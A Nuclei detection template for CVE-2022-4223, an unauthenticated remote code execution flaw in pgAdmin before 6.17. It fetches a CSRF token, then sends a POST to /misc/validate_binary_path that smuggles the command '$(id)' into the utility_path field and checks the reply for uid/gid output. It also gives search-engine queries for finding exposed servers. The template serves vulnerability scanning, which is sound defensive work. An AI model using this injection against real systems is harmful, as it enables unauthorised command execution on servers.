id: CVE-2022-4223

info:
  name: pgAdmin < 6.17 - Unauthenticated Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
    pgAdmin prior to 6.17 contains an insecure HTTP API caused by improper access control, letting unauthenticated users execute arbitrary external utilities via path manipulation; the exploit requires no authentication.
  impact: |
    Attackers can execute arbitrary external utilities on the server, potentially leading to remote code execution or system compromise.
  remediation: |
    Update to version 6.17 or later to fix the security issue.
  reference:
    - https://github.com/advisories/GHSA-3v6v-2x6p-32mc
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4223
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4223
    epss-score: 0.80069
    epss-percentile: 0.99565
    cwe-id: CWE-94,CWE-862
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"pgAdmin"
    fofa-query: title="pgAdmin"
  tags: cve,cve2022,pgadmin,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="csrf_token"[^>]*value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST /misc/validate_binary_path HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-pgA-CSRFToken: {{csrf}}
        Referer: {{RootURL}}/browser/

        {"utility_path":"/tmp/$(id)"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "uid=", "gid=")'
        condition: and

    extractors:
      - type: regex
        part: body
        regex:
          - 'uid=[0-9]+\([a-zA-Z0-9_-]+\)\s*gid=[0-9]+\([a-zA-Z0-9_-]+\)'
# digest: 4a0a0047304502200a68e9b31ebdc7b60656e8035e5e1cde9fdb7d962f6e417fb972bf0a957d1dea022100aa8399d6c5d9e08c3578a50d4ae82699c887ea4a84454912a25247848767ac56:922c64590222798bb761d5b6d8e72950